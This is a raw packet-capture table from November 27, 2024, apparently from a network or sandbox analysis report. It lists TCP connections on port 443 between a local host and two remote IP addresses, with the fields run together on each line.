                                                  Nov 27, 2024 18:10:06.545705080 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.545762062 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.552664042 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.552681923 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.552768946 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.552776098 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.552817106 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.560982943 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.561002016 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.561052084 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.561074018 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.561098099 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.561111927 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.561116934 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.561158895 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.561568022 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.561578989 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.631154060 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.631194115 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.631267071 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.631486893 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.631503105 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.636003017 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.636048079 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.636106014 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.636390924 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.636404991 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.636827946 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.636879921 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.636938095 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.637113094 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.637128115 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.692778111 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.692835093 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.692915916 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.704086065 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.704108953 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.976335049 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.976455927 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.976767063 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.977016926 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.977046013 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.006516933 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.007221937 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.007260084 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.007703066 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.007707119 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.027064085 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.027693033 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.027709961 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.028163910 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.028167963 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.125593901 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.126380920 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.126405001 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.126923084 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.126929045 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.191485882 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.191862106 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.191883087 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.192254066 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.193603992 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.193672895 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.193806887 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.193834066 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.224658966 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.224970102 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.224987030 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.226200104 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.226532936 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.226696014 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.226701975 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.226824045 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.228678942 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.228866100 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.228879929 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.229249954 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.229537964 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.229609013 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.229631901 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.229643106 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.233571053 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.233746052 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.233769894 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.234852076 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.234935045 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.235232115 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.235296011 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.235348940 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.235361099 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.269340992 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.270467997 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.281775951 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.282066107 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.282074928 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.283132076 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.283200979 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.283809900 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.283874035 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.284082890 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.284090996 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.284537077 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.284545898 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.337475061 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.338555098 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.440442085 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.440918922 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.440984011 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.442095995 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.442172050 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.442615986 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.442692041 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.442816973 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.442837954 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.454272985 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.454360962 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.454416037 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.454632998 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.454655886 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.454665899 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.454670906 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.458646059 CET49830443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.458684921 CET4434983013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.458772898 CET49830443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.459003925 CET49830443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.459016085 CET4434983013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.462490082 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.462557077 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.462616920 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.462846994 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.462852001 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.462883949 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.462888002 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.465147972 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.465595007 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.465615034 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.465720892 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.465784073 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.465864897 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.465985060 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.466012955 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.466079950 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.466084957 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.491331100 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.527440071 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.528703928 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.528728008 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.533598900 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.533610106 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.574034929 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.574106932 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.574202061 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.574388027 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.574409962 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.574420929 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.574425936 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.578782082 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.578808069 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.578870058 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.579083920 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.579097033 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.924202919 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.924263954 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.924323082 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:08.939174891 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.939199924 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.939222097 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.939277887 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.939291954 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.939317942 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.939342022 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:08.939346075 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.939380884 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:08.976134062 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.976202011 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:08.976257086 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.032957077 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.032975912 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.032988071 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.032995939 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.033324957 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.033349037 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.033363104 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.033370018 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.040262938 CET49833443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.040290117 CET4434983313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.040349007 CET49833443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.040683031 CET49833443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.040695906 CET4434983313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.041811943 CET49823443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.041824102 CET4434982394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.042068005 CET49834443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.042115927 CET4434983413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.042174101 CET49834443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.042315006 CET49834443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:09.042329073 CET4434983413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:09.047545910 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.049345970 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.049407005 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.050364017 CET49824443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.050375938 CET4434982494.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.053946018 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.053966999 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.054018974 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.054483891 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.054497957 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.057682037 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.057713985 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.057790041 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.057969093 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.057981014 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.076905012 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.076935053 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.076970100 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.076982975 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.076994896 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.077002048 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.077017069 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.077033043 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.077060938 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.134695053 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.134718895 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.134802103 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.134815931 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.134891033 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.289619923 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.289644957 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.289717913 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.289731026 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.289745092 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.289807081 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.289815903 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.289864063 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.308353901 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.308414936 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.308443069 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.308461905 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.308533907 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.309025049 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.309041023 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.531188965 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.532062054 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.532124043 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.538434982 CET49826443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.538444996 CET4434982694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.542803049 CET49837443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.542855978 CET4434983794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.542937040 CET49837443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.543153048 CET49837443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.543170929 CET4434983794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.909086943 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.913717031 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.913799047 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.913805962 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.913860083 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.919440031 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919467926 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919476032 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919504881 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919518948 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919526100 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.919531107 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919543982 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.919574976 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.919598103 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.919601917 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.951960087 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.952008009 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.952033043 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.952039957 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.952090025 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.954603910 CET49828443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.954637051 CET4434982894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.964282036 CET49838443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.964318037 CET4434983894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.964436054 CET49838443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.964603901 CET49838443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.964617014 CET4434983894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.968885899 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.968894005 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.968965054 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.968976974 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.969033003 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.969372988 CET49825443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.969382048 CET4434982594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.979959965 CET49839443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.979998112 CET4434983994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:09.980071068 CET49839443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.980417013 CET49839443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:09.980431080 CET4434983994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.307100058 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.307665110 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.307693958 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.308142900 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.308149099 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.309870958 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.309951067 CET4434983013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.310157061 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.310244083 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.311371088 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.311384916 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.311628103 CET49830443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.311646938 CET4434983013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.311969995 CET49830443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.311975956 CET4434983013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.525119066 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.525607109 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.525633097 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.526200056 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.526518106 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.526592970 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.526691914 CET49835443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.526705027 CET4434983594.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.527781963 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.527996063 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.528017998 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.529277086 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.529658079 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.529684067 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.529716015 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.529881001 CET4434983694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:10.581777096 CET49836443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:10.745531082 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.745609999 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.745672941 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.745937109 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.745959997 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.745970964 CET49832443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.745978117 CET4434983213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.748938084 CET49840443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.748985052 CET4434984013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.749206066 CET49840443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.749403954 CET49840443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.749416113 CET4434984013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.755121946 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.755214930 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.755278111 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.755378962 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.755417109 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.755450964 CET49831443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.755469084 CET4434983113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.760591030 CET49841443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:10.760631084 CET4434984113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:10.760701895 CET49841443192.168.2.613.107.246.63
